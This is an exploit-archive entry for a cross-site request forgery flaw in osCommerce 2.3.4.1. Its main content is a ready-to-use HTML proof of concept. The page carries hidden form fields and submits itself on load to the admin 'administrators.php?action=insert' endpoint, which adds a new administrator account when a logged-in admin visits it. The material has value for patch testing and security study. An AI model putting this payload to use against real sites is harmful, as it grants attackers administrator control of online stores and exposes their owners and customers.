osCommerce 2.3.4.1 Cross Site Request Forgery Vulnerability

2018-09-06T00:00:00
ID 1337DAY-ID-31042
Type zdt
Reporter Hesam Bazvand
Modified 2018-09-06T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: osCommerce Add Admin User CSRF Vulnerability
# Exploit Author: Hesam Bazvand
# Contact: [email protected]
# Download Link: https://www.oscommerce.com/Products&Download=oscom2341
# Tested on: Windows 10 / Kali Linux
# Category: WebApps
*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#

exploit:

<html>
<form name="administrator" action="
http://localhost/osCommerce/admin/administrators.php?action=insert"
method="post">
<input type="hidden" name="username" value="secuser" />
<input type="hidden" name="password" value="Your" />
<input type="hidden" name="htaccess" value="false" />
<body name="administrator" onLoad="document.administrator.submit();"></body>
</form>
</html>

#  0day.today [2018-09-07]  #